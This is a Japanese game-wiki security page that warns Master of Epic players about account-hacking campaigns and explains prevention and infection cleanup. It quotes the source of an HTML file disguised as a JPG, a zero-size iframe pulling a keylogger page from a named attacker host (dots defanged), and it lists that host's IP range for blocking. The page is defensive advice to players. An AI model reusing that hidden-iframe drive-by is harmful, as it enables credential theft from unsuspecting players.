#topicpath #contents #exlink x //-Todo //--PC初心者にも分かりやすくする //--1CDLinuxについて補足 *安全のために [#i5f97081] &color(red){&size(24){海外(特に中華系)のアカウントハックに要注意};}; **何が起こっているのか? [#x8b121d1] 2006年10月頃から、海外(特に中華系)からオンラインゲームを狙ったアカウントハックが多発しています。~ その多くはRMT(現金取引)の業者といわれています。~ アップローダに当時(2006/10)上げられた中華のHTML偽装jpgですが ドメイン情報 www■zhangweijp■com 61.139.126.10 country: CN CHINANET Sichuan province network (シナ四川省) 61.139.0.0 - 61.139.127.255 あきらかにROで各種サイトにリンクを貼り付けてアカウントハックの被害を出しまくった 中国人アカウントハック集団のサイトです。(www■zhangweijp■comでググるわかる) またリネージュでも被害が確認されている老舗(?)アカウントハックサイトです~ tmsn.exeという実行ファイルを強制DLさせられるので注意 これ以外にも様々なものがあります。上記URL以外にも十分気を付けましょう~ RagnarokOnlineやリネージュなどが被害の中心でしたが、その範囲はどんどん広まっています。~ Master of Epicも例外ではなく、実際に罠を仕掛けられたことがあります(後述)。~ ''2007/05/24頃からはゲーム内の募集チャットなどにURLをかき、興味を持った人にアクセスさせる手段も使われ始めました。''~ (これは中国人とは関係ないのかもしれませんが) **どんな手を使っているのか? [#r41d621d] 2007年3月段階で確認されているものをあげておきます。時間の経過に伴い新しい手段が出てくると思われます。 -jpg偽装型 --アップローダーなどにjpg画像ファイルに偽装をし、アカウントハックサイトに飛ばす罠を仕込む --コメントに「Dツアーおつかれさま」などと書き込み、警戒を解かせ踏む様に仕掛けています --InternetExplorerやIEコンポーネントのブラウザで踏むとキーロガー等を仕込まれます。 --中身は下記のようなものが一例 <html> <iframe src="http://www■zhangweijp■com/tt2/index■htm" width="0" height="0" frameborder="0"></iframe> <center><img src="http://www■zhangweijp■com/jpg/001■jpg"></center> </html> (上記は元ソースから.(ドット)を■に置き換えてある) --罠jpgのURLを2chの掲示板などに貼り付けたりということもある -Wiki編集型 --Wikiの編集しやすさを逆手に取り、リンクをアカウントハックサイトに書き換える --''このWikiでは外部へのリンクに記号がつきます'' ---参考:http://moepic.com/ ←一番右にあるマークが外部リンクの印(JavaScriptが無効だと出ません) --外部リンクの際には飛ぶ先が本当に正しいか注意してください -Blogコメント型 --個人の運営するBlogに、興味を持つようなコメントを付けることでURLへと誘導する手口。 --例えば、「Blog移転しました、今度からはこっちをブックマークお願いします」など。 -ネットカフェ仕込み型 --不特定多数の人が使うネットカフェにキーロガーなどを仕込む方法 これらの他に、 -アダルトサイトやRMTサイトなどへの誘導 -ブラウザクラッシャーへの誘導 といったことも見られますが、これらは業者の宣伝であったり、愉快犯によるものと思われます。~ これらはアカウントハックを行うことを主な目的としないと思われるため、IDやPASSを盗み出す可能性は低いと考えられます(全くないわけではないが)。 **ゲーム内の中国人と思われる集団について [#v82eb0bf] ***狩り場にて [#sdf576b2] -主にエイシスケイブやミッシーを中心として、ほぼ24時間活動していてピンイン語を主に使う集団が確認されています。 -彼らの多くは「中国人で、RMT目的とした業者」であると考えられています。 -運営のゴンゾロッソは「直接、迷惑行為など被害を受けた場合」に限り、以下のものをあわせて連絡することで、「調査対象」とするようである。 --該当キャラクター名 --該当する発言の会話ログ --該当する行為および発言を受けた日時 --該当する行為および発言を受けた場所 -事実上、狩場を占有している(これ自体はほめられはしないが禁止でもない)に過ぎないため、上記のような証拠をプレイヤーで押さえることは難しい -また、迷惑な存在ではあるがRMT業者であるという直接的な証拠もないのでいかんともしがたい -あくまで「一般プレイヤー間の問題」ということで、フィルターに入れるなど各個人の対策に委ねられているのが現状 ***極端に安い露店 [#fccb6ca6] -主に課金装備(格闘家装備、ハロウィン装備など)や、花びら交換券を大量かつ通常の相場より非常に安い値段で並べる露店が2007年9〜10月に確認されました。 -これらのプレイヤーの国籍は不明ですが、「クレジットカードの不正利用」によるものという公式発表がありました。 -これらの格安アイテムを買った場合、不正に絡んだということで調査対象になる可能性があります。 -以下公式発表 A)クレジットカードの不正利用によって購入されたアイテムについて これらのアイテムにつきましては、原則的に回収を行なわない予定です。 B)処罰対象 今回アカウント強制停止を行ったアカウントは次の通りです。 1:クレジットカードの不正利用を行ったアカウント これらのアカウントは、調査によりRMTの業者であることが確認されました 2:1のアカウントとの不正な取引が確認されたアカウント 3:当社の調査により1のアカウントと関与していることが確認されたアカウント ゲーム内にて、クレジットカードの不正利用によって購入されたアイテムを 取得したアカウントについては、今回の処罰対象とはいたしません。 -ともかく、いくら買っても補充されてるような格安露店には注意すべき。 **何をすればいいの? [#z7749630] 以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』(http://www.higaitaisaku.com/korobanu.html)が参考になるでしょう。 -基本 --定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ等)のアップデート --アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新 --パーソナルファイアーウォールソフトの導入 --アドレスをホイホイ踏まない。よく確認する。「ソースチェッカーオンライン」などのブラクラチェックサイトを利用する。 --出所の怪しいプログラムやスクリプトを実行しない -応用 --IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera) --IEコンポーネント使用のブラウザを使う (セキュリティ設定が容易な物が多い) --信頼できるSite以外ではスクリプトやActiveXを切る ---インターネットオプションのセキュリティの部分で設定可能 --偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない) ---インターネットオプション→セキュリティ→レベルのカスタマイズ→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする **何をすればいいの?もっと詳しく [#j819b7eb] -接続禁止IPレンジの設定 --セキュリティソフト等で61.139.0.0 - 61.139.127.255を接続禁止IPレンジとして登録しておきましょう。万が一踏んだとしても接続拒否しておけば被害を防止できます --ファイアウォールソフトごとに設定の可否、またその方法も違うようです -hosts編集 (接続拒否設定)~ --hostsが何かについては[[こちら>http://ja.wikipedia.org/wiki/Hosts%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB]]参照 --Windows XP、Windows Server 2003 の場合 : c:\windows\system32\drivers\etc\hosts --Windows 2000 の場合 : c:\winnt\system32\drivers\etc\hosts --編集はtxt editorで行えます --編集後は上書き禁止にすること # Copyright (c) 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 127.0.0.1 localhost 0.0.0.0 61.139.126.10 --#の行はコメントなのでなくてもよいです **PCにウィルス対策ソフトを導入してない方へ [#de27ee03] ※一種類で安心しないように -avast!アンチウイルス 有料版と無料版があり、どちらも60日目以降はどちらもユーザー登録(+有料版は料金の支払い)が必要 --http://www.avast.com/index_jpn.html -ZoneAlarm(ファイヤーウォールソフト 基本機能だけの無料版アリ)オンラインスパイウェアスキャンも。 --http://www.zonealarm.com/store/content/company/products/znalm/freeDownload.jsp?dc=34std&ctry=EU&lang=en -トレンドマイクロ ウイルスバスターオンラインスキャン --http://www.trendmicro.co.jp/hcall/index.asp -Ad-Aware SE スパイウェア対策ソフト 有料の「Professional」「Plus」と無料の「Personal」がある。 --http://www.lavasoft.com/products/ad-aware_se_personal.php -Spybot 無料のスパイウェア対策ソフト --http://enchanting.cside.com/security/spybot1.html -Kaspersky Anti-Virus (体験版) オンライン ウイルス&スパイウェアスキャナもあり --http://www.kaspersky.co.jp/ -NOD32 アンチウイルス (体験版) --http://www.canon-sol.jp/product/nd/trial.html 2chのネトゲ実況3のスレにこれらのアドレス(アップローダーのjpgや、アカウントハックサイトそのもの等)のURLが貼られる事が稀に出始めています。 また、このページと同じように警戒を呼びかける文章で、ウイルス対策ソフトや対策ページのURLがアカウントハックサイトのものに変えられている事もあります。 十分に気を付けましょう。 アカウントハックされても基本的に自己責任となり、また、失ったアイテムやアカウントを復元する事は不可能です。 自分の身は自分で守りましょう。 **怪しいファイルを踏んでしまったときには [#l9b237d2] ***感染したと思ったら? [#e87a0d15] +''まずは落ち着きましょう'' --冷静に対処を行う必要があります --&color(red){どういう状況で感染したか};(したと思ったのか)をキチンと把握(若しくはメモ)して下さい。再発防止・原因究明に役立ちます +''LANケーブル/電話線を引っこ抜きましょう'' --既にID&Passを送信されていなければ、単純ですが最も効果の有る処置です([[参考>http://neta.ywcafe.net/000665.html]]) --ケーブルを繋いだ状態、若しくは加えてMoEを起動したり公式をブラウザで開いたりは絶対に行ってはいけません。ID/Passwordが漏洩する恐れがあります +''安全と思われるPCより公式にアクセス、Passwordを変更する'' --ウイルス感染中のPCを決して使用してはいけません。 --他にPCを所持してない場合は、下の『注意』の項を参照の事 +''システムの復元オプションを無効にする'' (Windows Me/XP) --何とかシステムを復旧させてもバックアップから復活されては意味が有りません --[[WindowsMEの方法>http://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jdocid/20020405043621953?OpenDocument&src=sec_doc_jp]] と [[WindowsXPの方法>http://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jdocid/20020407222052953?OpenDocument&src=sec_doc_jp]] を参考にして下さい (シマンテックSiteより) --[[WindowsFAQ>http://winfaq.jp/]]も参考になるでしょう --完全復旧後はこれと逆の操作を行い、復旧オプションを有効化させましょう +''アンチウイルスソフトとスパイウェア検出ソフトでPCをチェックする'' --必須です。出来るだけ最新の定義ファイルである事が望ましいです ((前項より、常にUpdateする事が大事になります)) --アンチウイルスソフト等が入ってない場合は、速攻買ってくるか安全と思われる別のPC経由で手に入れるべきです ((勿論定義ファイルは最新にする事)) --オンラインスキャンという手も有りますが、Networkに繋がっているという事は危機((ウイルスの再感染&ばら撒き・情報漏洩等))に晒されているのと同義であり、全くお勧め出来ません --アンチウイルスソフトの探知から逃れるべくウイルスは日々改造されています。よって仮に検出されなくても100%安心できるとは言えません --上手く削除できない場合はセーフモードやコマンドプロンプトオンリーのモードで起動して対処する事も考慮に入れて下さい (Win98/Meの場合はPC起動時にctrlキーを、WIn95/2k/XPの場合はF8キーを押しつづければOK) +''それでも不安なら…'' --PCの再セットアップ(OSのクリーンインストール)を行いましょう。セキュリティパッチ等のアップデートは必須です --アカウントハック関連のウイルスは感染性が弱めなので、感染に対して多少の注意をしながら行えば大体消えてくれます +''公的機関への届け出'' --実際に被害があった場合は正真正銘の犯罪ですので警察への届出は重要です --[[警察庁サイバー犯罪対策>http://www.npa.go.jp/cyber/]]あたりから窓口を探しましょう((知識が有る人の居る専門の窓口以外は使用しないほうが良いです)) --また、独立行政法人 情報処理推進機構 セキュリティセンター(IPA/ISEC)への届出も重要です。~ 統計データ上、オンラインゲーム関連の被害が増えている事が明白となれば、研究課題として取り挙げられる可能性も高くなります。 --[[IPA/ISEC 情報セキュリティに関する届出について>http://www.ipa.go.jp/security/todoke/]] +''ゴンゾロッソへ報告を行う'' --あまり期待は出来ませんが、やっておくに越した事は無いです -''注意'' --基本は &color(red){感染PCのNetworkからの隔離}; と &color(red){迅速な処置}; です --安全と思われるPCが無い場合は各自のスキルに依存します。以下の選択枝を考慮してください +++手動/ソフトによるウイルス削除を頑張って行う (その後にPassword変更) +++PCの再セットアップを頑張って行う (その後にPassword変更) +++友人のPCやネットカフェ利用 +++1CD Linuxの利用 (Wikipedia:[[1CD Linux>http://ja.wikipedia.org/wiki/1CD_Linux]])。 --清浄化を確認するまでMoE関連のプログラムやSiteに近寄らずにお掃除作業を行えばウイルスの悪影響から回避出来るかもしれませんが(多くはキーロガーやメモリサーチタイプと推測されるので、ID&Passを打たなければ良いかもしれない)、安全な橋とは言い難いのを付け加えておきます どう考えてもトロイっぽいのが動いているかどうか、まずはプロセスマネージャで確認 -マカフィーのサイト よくある質問: タスクマネージャを利用して実行中のプロセスを停止させる方法 --http://www.mcafee.com/japan/mcafee/support/faq/answer_f_alert.asp?wk=AR-00008 -Windowsの「タスクマネージャ」を便利に使う3つのTips --http://www.itmedia.co.jp/bizid/articles/0703/06/news050.html -プロセス? :マルチタスクOS環境におけるプログラムの実行単位。 --http://www.atmarkit.co.jp/icd/root/78/5787378.html -Windowsのスタートアップやタスクマネージャに現れるプロセス、実行ファイルのリスト --http://cowscorpion.com/tasklist/index.html ---プロセスの名前と内容がよく判らない時はここで。通常存在しないプロセスを発見したらググル前にここで調べる事。問題のないプロセスを勘違いして殺さないように。 -ベクター :プロセス関係のソフトウェアDLサービス --http://www.vector.co.jp/vpack/filearea/win/util/task/ -怪しい常駐プログラムを動作させなくする方法 --スタート→「ファイル名を指定して実行」→ 名前(O): のところへ msconfig と入れ OK --システム構成ユーティリティが起動するので一番左のタブ「スタートアップ」を選択 --スタートアップ項目、コマンドを確認して その壱で見つけたトロイ実行プロセス(exe)が無いか確認する。 --存在する場合はその部分のスタートアップ項目からチェックを外す --ちなみに"コマンド"部分にはその実行ファイル(exe)が存在する場所が書かれているので そのフォルダを開いて後で削除できるように覚えておく事※1 --OKを押すと「システム構成の変更を有効にするには、再起動する必要があります」と表示される --ブラウザなどの実行されているプログラムを全て閉じてから再起動(R)を押す。 --念のために再起動する前にネット接続を物理的に遮断しておくとより安全。 --再起動したらもう一度プロセスマネージャからトロイが実行されていないか確認する。 --プロセスマネージャに存在していなければ※1で調べておいたフォルダを開く --該当する実行ファイル(exe)を削除もしくは拡張子をexeからbakなどに変更して実行できなくする。 --万が一、間違っていた場合に備えて拡張子を変更するだけにしておけば復元も出来る //この段落の「その壱」はどこのことでしょう **謝辞 [#f4876a43] このページを書くにあたり非常に参考にさせていただきました((コピーペーストばかりで申し訳ありません))~ 参考: http://smith.rowiki.jp/?Security どうもありがとうございます。 **MoE関連の事件履歴 [#kb4429f2] -2006年10月 --アップローダーに「Dツアーおつかれさま」というコメントともに偽装JPG(踏むとキーロガーを仕込まれる)が投稿される。 -2007年5月 --ゲーム内募集チャンネルで鍵付きでURLのみ書かれたチャンネルがたてられる。 -2007年7月 --このWikiのメニューバーほとんど全域にわたって日本語アダルトサイト行きリンクに書き換えられる。 -2007年8月 --このWikiのメニューバーの数カ所がウィルス「VBS/Psyme」(キーロガーと思われます)の仕込まれているサイトへのリンクに書き換えられる。 -2007年9月中旬〜10月10日 --作りたてと思われる旅人キャラが課金アイテムを相場より格安で大量に販売する露店が目撃される --2007年10月10日、クレジットカードの不正利用があったと公式アナウンスが出る。 --そのアナウンスによると、公式はこの件に関し当該アカウント・関連アカウントに対し128件の停止措置、および調査を行ったということであった -- [[07-10-10 クレジットカードの不正利用者に対する取り組みについて:http://moepic.com/top/news_detail.php?hidden_key=11afc820501eef04091f90eb00aaeafef158a2cfde1d41e0d8805e1264f632dbd1a52e64f7e1ea3c56d12c699dfe87]] **コメント [#iebb1b29] ''わからないことは[[外部掲示板>Link/質問スレ]]の該当スレなどで聞きましょう。''~ //一応どんなかたちで使われるか分からないがコメントを付けてみる #pcomment(安全のために/コメント,8)